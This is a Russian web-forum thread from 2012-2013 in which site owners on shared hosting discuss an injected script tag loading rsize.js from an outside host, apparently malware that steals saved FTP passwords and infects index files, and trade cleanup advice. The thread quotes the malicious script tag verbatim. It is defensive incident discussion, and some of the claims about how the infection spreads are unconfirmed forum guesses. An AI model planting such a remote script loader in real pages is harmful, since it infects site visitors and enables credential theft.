Форум на Kuban.ru (http://forums.kuban.ru/)
-   Веб-дизайн и программирование (http://forums.kuban.ru/f1030/)
-   -   rsize.js (http://forums.kuban.ru/f1030/rsize_javascript-3336974.html)

aquadeZign 22.11.2012 10:25
rsize.js
 
В сгененированном коде сайта после </html>
появился вот такой скрипт
<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>
Что за зверь такой ?

Гламурный Креведко 22.11.2012 11:28
С большой долей вероятности - заражение

aquadeZign 22.11.2012 13:51
каким то боком проифреймили сайт, но логи админки малчат, как и все другие логи. Погуглил слегка, смотрю многие (чужие) сайты заражены им.

Квадратный Круг 22.11.2012 13:53
Сайт на VDS/VPS/Shared hosting? Путей проифреймить очень много.

aquadeZign 22.11.2012 13:58
Shared hosting на Sweb

Квадратный Круг 22.11.2012 14:04
Тогда путей ещё больше. Для начала найти вредоносный код в php и inc файлах и удалить его. перед этим сменить пароли на админку и ftp и [b]никогда[/b] больше не сохранять их в клиентском софте.
Но и это может не помочь - могут через соседей поиметь или через дырки в вашем сайте.

aquadeZign 22.11.2012 14:24
Да код то я удалил, он сидел только в стартовом index.php (жаль не записал последнее время изменения файла). Теперь буду проверять его регулярно, по времени изменения index.php проще будет искать потом.

validero 12.05.2013 02:20
[quote=aquadeZign;27826605] Да код то я удалил, он сидел только в стартовом index.php (жаль не записал последнее время изменения файла). Теперь буду проверять его регулярно, по времени изменения index.php проще будет искать потом. [/quote]

Этот скрипт представляет собой вредоносный код
Назначение: ворует пароли и аккаунты, сохраненные в Менеджерах паролей, заражает сайты, автоматически прописывая в index.html и в index.php свои скрипты. Скрипты разные. Как его удалить и что и где проверять подробно написано здесь [url]http://www.spravkasleavka.ru/internet/tak-vot-ty-kakoj-rsizejs.html[/url]

ars_2007 12.05.2013 19:59
7-validero >
а как он появляется (система/пхп-дыры/шаблоны) там не сказано?

validero 13.05.2013 13:48
[quote=Гавайские субтитры;30384021] 7-validero &gt; а как он появляется (система/пхп-дыры/шаблоны) там не сказано? [/quote]

Через ваш комп. Подхватываете у себя, он на вашем компе засканил сохр.пароли и вошел к вам на сайт (100% уверенности нет - не я его писал и пользовался :)))) Написано в этом заголовке [b]Как могло произойти заражение[/b]

ars_2007 13.05.2013 17:19
[quote=validero;30391705]Подхватываете у себя, он на вашем компе засканил сохр.пароли и вошел к вам на сайт [/quote]
обождите, он же вроде с ифрейма сканит.
Надо искать, как он влез на сайт. Сам фрейм.
Пишите на хостинг или чо оно у вас там. Отслеживайте.

dolg 13.05.2013 19:33
Такая же проблема произошла. Я тоже хостюсь на sweb - два сайта. Два моих индексных файла изменили чудесной функцией под названием collectnewss(). Нашли Касперским, пожаловались 1.5 недели назад

dolg 13.05.2013 19:37
Причем мои копии не тронуты с прошлого года. Т.е. возможен вариант через соседей.

validero 16.05.2013 16:45
[quote=Гавайские субтитры;30394682] Цитата: Сообщение от validero Подхватываете у себя, он на вашем компе засканил сохр.пароли и вошел к вам на сайт обождите, он же вроде с ифрейма сканит. Надо искать, как он влез на сайт. Сам фрейм. Пишите на хостинг или чо оно у вас там. Отслеживайте. [/quote]

Ну вот кусок цитаты из той статьи: "...При переходе на ваш сайт, пользователь перенаправляется к злоумышленнику и там заражается.
2. Еще, бытует мнение, что можно заразиться от хостинга, на котором..."
1 Разве это не ифрейм?
2 Как троянские проги попадают в комп?
2 Там уже неделю как ничего нет. Зачем писать на хостинг?

Вы поэтому стесняетесь переходить? - Боитесь заразиться?
Хорошо. Вот [b]предыстория[/b] того, что было:
8го вечером подхватил. Всю ночь чистил. 9го мая, когда проснулся, Яндекс уже поздравил с днем победы над вредоносным кодом и снял опалу. (Повезло) Сегодн 16е — пока тихо. Проверял 3 часа назад. Основные действия, которые обычно не упомянуты:
На FTP-сервере поднимитесь на уровень выше и пересмотрите всю папку webspace.Там перепроверьте все. Почистите вр.коды в https протоколах. Если будут попадаться файлы index.html~ в них тоже прописан скрипт после </html>. Если на сервере несколько сайтов — чистите все.
Все остальные действия борьбы с этой заразой, которые я применял, подробно описаны здесь [url]http://www.spravkasleavka.ru/internet/tak-vot-ty-kakoj-rsizejs.html[/url]

validero 16.05.2013 17:05
[quote=dolg;30396274] [/quote]
Чтобы узнать от соседей заражение или нет - надо, первым делом, поменять пароль на FTP-сервере (особенно если вы пользуетесь FileZilla Client) и больше не хранить его в менеджере паролей а вводить вручную при каждом заходе. Потом вычистить все, что принадлежит вам на хостинге. Если вновь появиться, тогда смело предполагать, что хостинг был заражен и заражение произошло через соседей. Логично?


Текущее время: 23:09. Часовой пояс GMT +3.